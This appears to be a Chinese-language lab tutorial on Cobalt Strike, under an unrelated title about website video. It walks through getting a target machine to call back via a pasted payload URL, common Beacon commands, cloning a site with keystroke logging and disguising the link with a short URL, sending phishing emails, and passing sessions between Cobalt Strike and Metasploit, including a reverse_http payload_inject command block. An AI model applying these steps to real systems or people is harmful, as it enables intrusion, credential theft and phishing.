做的網(wǎng)站怎么放視頻如何做網(wǎng)站的教程
1.上線機(jī)器的Beacon的常用命令
2.信息收集和網(wǎng)站克隆
3.釣魚郵件
4.CS傳遞會(huì)話到MSF
5.MSF會(huì)話傳遞到CS
1上線機(jī)器的Beacon的常用命令
介紹:CobaltStrike分為服務(wù)端和客戶端,一般我們將服務(wù)端放在kali,客戶端可以在物理機(jī)上面,或者虛擬機(jī)都可以
啟動(dòng)服務(wù)端,首先創(chuàng)建一個(gè)監(jiān)聽(注意,這里要關(guān)閉kali的Apache服務(wù),要不然端口占用創(chuàng)建監(jiān)聽不成功)
payload選擇Beacon HTTP ,HTTP Hosts選擇服務(wù)器的IP
點(diǎn)擊save
接著我們用CS生成一個(gè)payload(Windows exe),使得我靶機(jī)上線:
Lisrener選擇我們創(chuàng)建的監(jiān)聽服務(wù),點(diǎn)擊Launch
接著會(huì)生成一段payload,只要我們將這段payload在其他機(jī)器的win+R上粘貼運(yùn)行,機(jī)器就會(huì)上線
利用:
打開CS上方的小云朵,會(huì)出現(xiàn)我們剛剛生成的web服務(wù)
選中服務(wù),點(diǎn)擊下方的Copy URL
啟動(dòng)我們的Windows10靶機(jī),使用win+R,然后將我們復(fù)制的粘貼上去,點(diǎn)擊確定
靶機(jī)上線
接著右擊,打開命令窗口,輸入命令就可以查看目標(biāo)機(jī)器信息
常用命令:
1.調(diào)節(jié)時(shí)間可以更快的看到執(zhí)行命令:sleep 3 (務(wù)必執(zhí)行要不然回顯太慢)
2.如果有的命令沒有找到提示Unknow command:命令前加shell,比如:shell whoami
3.查看局域網(wǎng)情況:net view
4.我們可以可以對(duì)機(jī)器進(jìn)行瀏覽器代理、VNC桌面交互、文件瀏覽、網(wǎng)絡(luò)探測(cè)、端口掃描、進(jìn)程列表和屏幕截圖等等,這里不再一一展示
2.信息收集和網(wǎng)站克隆
信息收集:
生成的一個(gè)網(wǎng)頁(yè)我們直接Launch即可
這時(shí)候會(huì)生成一個(gè)網(wǎng)址:
只要?jiǎng)e人在內(nèi)網(wǎng)中訪問這個(gè)網(wǎng)址,我們就可以得到機(jī)器信息
使用Windows10,訪問:
我們就可以在CS中的web log中獲取機(jī)器的信息:
網(wǎng)站克隆:
我們輸入我們需要克隆的網(wǎng)址,這里我選擇的是百度,然后選擇路徑,Attack是攻擊的站點(diǎn),可以選也可以不選,這里我選的是信息收集的站點(diǎn),開啟鍵盤記錄
生成成功:
如果我們要發(fā)給別人,讓其訪問,但是這樣別人一看就不是正常的網(wǎng)址,我們可以用短鏈接修飾一下,使他看起來(lái)更有迷惑性:
這里可以隨便選,我選的第一個(gè),瀏覽器訪問:
之前開了鍵盤記錄,隨便輸一個(gè):pengyuyan
查看CS的web log:
記錄成功
3.釣魚郵件?
第一個(gè)Targets:目標(biāo),我們新建一個(gè)文本文件,將想要發(fā)送郵件的目標(biāo)地址寫上去
第二個(gè)Template:就是模版,我們可以登錄自己的郵箱,自己給自己發(fā)送一封郵件,然后點(diǎn)擊導(dǎo)出eml文件(注意這里的郵件內(nèi)容自己編寫,可以把自己克隆的網(wǎng)站寫上去)
第三個(gè)Attachment就是附件:可以不填也可以填一個(gè)可執(zhí)行程序
第四個(gè)Embed URL:嵌入U(xiǎn)RL地址,同樣可以寫我們監(jiān)聽的地址
第五個(gè)郵件服務(wù)器:
第一個(gè)和第二個(gè)固定,第三個(gè)是自己郵箱,第四個(gè)是授權(quán)碼,需要我們自己生成:
SSL連接
注意:這里要開啟服務(wù)才行
第六個(gè)填寫自己的郵箱地址
最后點(diǎn)擊發(fā)送,這里是用我自己郵箱測(cè)試,查看自己的郵箱,果然發(fā)送成功:
4.CS傳遞會(huì)話到MS
打開MSF,建立監(jiān)聽:
注意這里需要使用的HTTP服務(wù),寫上本機(jī)IP,運(yùn)行
打開CS,我們新建一個(gè)監(jiān)聽器:
點(diǎn)擊save
然后選擇靶機(jī)右鍵:
選擇我們新建的監(jiān)聽器:
等待MSF連接:
連接成功
5.MSF會(huì)話傳遞到CS
?我們打開Windows7,使用永恒之藍(lán)漏洞先讓MSF上線:
接著進(jìn)行設(shè)置:
返回后臺(tái)bg
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.11.128 # CS服務(wù)端IP
set lport 4444?# CS服務(wù)端監(jiān)聽的端口號(hào)
set DisablePayloadHandler True
set PrependMigrate True
set session 1 # 會(huì)話id
run
打開CS創(chuàng)建一個(gè)新的監(jiān)聽器:
save,等待上線
成功上線